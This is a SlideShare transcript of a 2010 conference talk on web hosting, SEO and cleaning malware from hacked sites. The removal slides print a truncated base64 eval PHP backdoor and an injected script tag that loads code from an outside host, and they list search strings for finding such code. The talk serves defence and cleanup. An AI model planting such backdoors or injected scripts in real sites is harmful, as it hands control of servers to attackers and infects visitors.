Flash Player 9 (or above) is needed to view presentations.
We have detected that you do not have it on your computer. To install it, go here.

Like this presentation? Why not share!

2010 11 pubcon_hendison-hosting



Scott Hendisons Pubcon 2010 presentation on web hosting and SEO

Scott Hendisons Pubcon 2010 presentation on web hosting and SEO



Total Views
Views on SlideShare
Embed Views



2 Embeds 56

http://www.pdxtc.com 43
http://www.seoautomatic.com 13



Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
Post Comment
Edit your comment

    2010 11 pubcon_hendison-hosting 2010 11 pubcon_hendison-hosting Presentation Transcript

    • Hosting & SEO Scott Hendison Search Commander, Inc. SEO Automatic
    • About Scott Hendison
      • Began “hosting“ websites in 1997 with one server in our retail computer store, with standard DSL
      • Grew to 11 servers then switched to a sort of “datacenter co-op“ a few years ago, all in the same local facility in Gresham Oregon.
      • Not our primary business, but we still host over 1000 domains today, as well as maintain end-user hosting accounts on several major hosts.
    • Web Hosting and SEO
      • I've been on this panel three times and discussed –
        • shared vs. dedicated servers
        • Static vs. shared IP addresses
        • Apache 1 vs Apache 2
        • Apache vs. Windows
        • .htaccess
        • mod_rewrite
        • Windows IIS rewriting options
        • Server speed and performance
        • and other riveting subjects trying to better relate to SEO
    • Web Hosting and SEO
      • Speed and Performance
      • I “predicted” at Pubcon 2009 that speed will soon matter for organic, then Matt Cutts announced next day
      • Not a risky prediction, considering Adwords Quality Scores
      • Speed as ranking factor began “counting” April 9, 2010
      • Google has two great tools
        • Page Speed for Firefox – (download inside Webmaster Tools)
        • Google Chrome (right click in Chrome and “inspect element”)
    • But I‘m Not Talking About Speed
      • Far more important
      • The #1 killer of websites
      • The thing that drives visitors away in droves
      • Drains PPC money as fast as possible
      • Google stops people from even arriving at your site!
      • I’m talking about…
    • Malware
    • Malware
      • Nothing can fully protect users from getting viruses
      • Viruses can steal the BEST passwords & logins
      • If you don’t get one, contractors, employees or family probably will, infecting your network.
      • People should use index cards and a fireproof safe
      • But that’s pretty unrealistic, so learn to deal with disasters
    • Malware identification
      • Nearly 15% of “our” sites were hacked in 2010
      • Most were self inflicted through laziness and stupidity
      • The hacks really didn’t vary all that much
      • Getting rid of hacks can be a headache
      • Getting back into Google isn’t very difficult
      • Protecting yourself FROM hacks is getting easier, but…
      • Sadly, the hacking keeps getting easier…
    • Malware
      • Identification
      • Removal
      • Prevention
    • Identification
      • You can get notified by a client or customer
      • You discover it in a browser or AV warning
      • You can see your site flagged in the SERPS
      • You can get notified by Google WMT – (sometimes)
    • Malware Warnings
    • Warnings in the SERPS!
    • Interstitial Page
    • #1 Conversion Killer
      • Nothing hurts you more than if people wont come to your site in the first place.
      • Once you‘ve identified a problem, what can you do?
        • Clean up the offending code
        • Beg Google for a clean bill of health
      • Email with questions: [email_address]
    • Removal
      • Most hacks we saw were pretty similar
      • Cross Site Scripting (XSS) and SQL Injection
      • Adding links and adding hosted scripts
      • Hackers want to add links to your site
      • Hackers want to add scripts to infect users with viruses which in turn, steal more passwords
      • Not too technical - Look for strange javascripts!
    • Removal
    • Removal
    • Removal
      • If WMT is no help, then look at files manually
      • Use backups and file comparison tools
      • Check recent change dates
      • Look for things that don‘t belong, often in pages named index, home, and default - in .php and .html extensions
      • Look in headers and footers too
    • Removal
      • <?php
      • eval(base64 _decode('aWYoIWlzc2V0KCRtNzc5djEpKXtmdW5jdGlvbiBtNzc5digkcyl7aWYocHJlZ19tY<snip> XRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjJ203Nzl2MicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); ?>
      • (<snipped> goes on for dozens of lines )
    • Removal
      • Usually index, home, header and footer –
      • <script src=http://domainX.ac.jp/course/VIVID.php ></script>
      • And in most or all javascript files -
      • document.write('<script src=http://domainX.ac.jp/course/VIVID.php ></script>');&quot;
    • Removal
      • Not all that complicated, just tedious.
      • Search files for <script src=http:// and make sure you recognize them all, and search for eval(base64 too.
      • Overly simplistic to say “clean it up“ but others have likely had your same problem.
      • Google for it w/ quotes to find YOUR exact code.
      • Get a quick look at your site w/ free tool at http://UnmaskParasites.com
    • Once You‘re Clean
    • Once You‘re Clean
      • Write something like this –
      • Thank you for identifying our malware problem, and we believe all is now cleaned up. We have verified that we're clean using an online scanner - http://www.unmaskparasites.com - and would appreciate a speedy resolution.
      • Thank you,
      • Scott Hendison
    • Once You‘re Clean
      • Document your process and improve it
      • Get ready to have it happen again
      • Begin to protect yourself – Get paranoid.
    • Prevention
      • FTP Passwords
        • Don't share FTP access – make new users instead.
        • NEVER use a dictionary word in the password
        • Use at least 8 characters (some people will say 20+)
        • Mix Upper Case, Lower Case, numerals and symbols
        • CHANGE passwords without telling your dev people every few months.
      • Stop using plain old FTP - WinSCP is free SFTP
    • Prevention
      • Using a CMS?
      • Find the documentation on locking it down
      • Do ALL system updates
      • Do ALL released security patches
      • Routine maintenance (just like WMT & Analytics)
      • More popular = more vulnerable, like WordPress
    • Prevention
      • Nearly 8% of all sites are now WordPress*
      • We work in Wordpress 95% of the time
      • Same thing that makes it great makes it riskier
      • Amazing plugins have been developed for safety
      • Common threats have easy solutions
      • * Supposedly said my Matt Mullenweg at one of the 2010 WordCamp, but I can‘t prove it.
    • Prevention
    • Prevention
    • Prevention
    • Prevention
    • Prevention
      • Total prevention may be impossible. Be prepared!
      • Backup restoration sometimes faster than repair
      • Hosts can may keep backups 7 days, or even less!
      • Get weekly (or daily) backups in place & off-host
      • Store a year of monthly backups at AWS
      • Document the entire restore process and TEST
      • Your site hack is generally not the webhosts fault!
    • Take-aways
      • FAR more important than your SEO
      • Dig into Webmaster Tools malware area
      • Change all FTP Passwords asap, & consider SFTP
      • Check for updated versions on forms, and on your CMS
      • Get backup and restore processes in pl ace NOW
    • Thank You
      • WordPress Lunch Table Thursday 1:30
      • Scott Hendison
      • Search Commander, Inc.
      • [email_address]